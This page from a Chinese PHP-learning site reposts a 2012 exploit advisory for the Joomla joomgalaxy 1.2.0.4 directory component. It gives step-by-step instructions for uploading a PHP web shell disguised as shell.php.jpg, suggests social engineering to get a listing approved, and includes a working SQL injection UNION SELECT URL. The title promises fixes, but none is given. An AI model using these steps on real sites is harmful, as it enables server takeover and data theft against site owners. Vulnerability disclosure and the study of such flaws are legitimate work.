网站地图    收藏   

主页 > 后端 > 网站安全 >

Joomla joomgalaxy 1.2.0.4多重缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites作者: Daniel Barragan D4NB4R开发者: http://www.joomgalaxy.com/影响版本: 1.2.0.4 (last update on Jul 27, 2012)测试平台: [Li......

标题: Joomla joomgalaxy 1.2.0.4 Multiple Vulnerabilites
 
作者: Daniel Barragan "D4NB4R"
开发者: http://www.joomgalaxy.com/
 
影响版本: 1.2.0.4 (last update on Jul 27, 2012)
 
测试平台: [Linux(bt5)-Windows(7ultimate)]
 
 介绍
Joomgalaxy is a rich, comprehensive directory component brimming with unique
features like Entry comparison, Pay per download, Tagging, Email Cloaking,
Review and Rating with Multiple Attributes, add Articles to Entries,
with many more plus all standard directory features as well.
 
 
1. 非法文件上传
 
    
 
     1a. Go to this route, Complete the form and login the site
         Ingrese a esta ruta, Complete el formulario e ingrese al sitio
    
                http://www.2cto.com /index.php?option=com_users&view=registration
 
 
     1b. go to the following link and create a new post (sometimes it ask for
confirmation of an administrator)
         so then create the post with something of social engineering and wait
for a confirmation, if not forget this step
 
         vaya a este enlace cree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
         asi que cree el anuncio con algo de ingenieria social y espere que confirmen
si no omita este paso
 
               http://www.2cto.com /index.php?option=com_joomgalaxy&view=addentry
 
 
     1c.  once the post is published go to the tab images and upload your shell in the
following way: shell.php.jpg
          Una vez resgistrado el anuncio dirijase a la pestaña imagenes y suba su
shell de la siguiente forma
          shell.php.jpg
  
             
     1d.  Find your shell in the path
          Busque su shell en este path
 
           http://www.2cto.com /administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg
 
 
2. Sql注射
 
    
    p0c: 
 
           http://www.2cto.com /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0
union (select 1,database(),3,4,5,6,7,8,9,10,11,12,13)
 
 
     
    Gretz : devboot, P1l0tcast, ksha, dedalo, etc..
  
 
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________
Daniel Barragan "D4NB4R"  2012

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论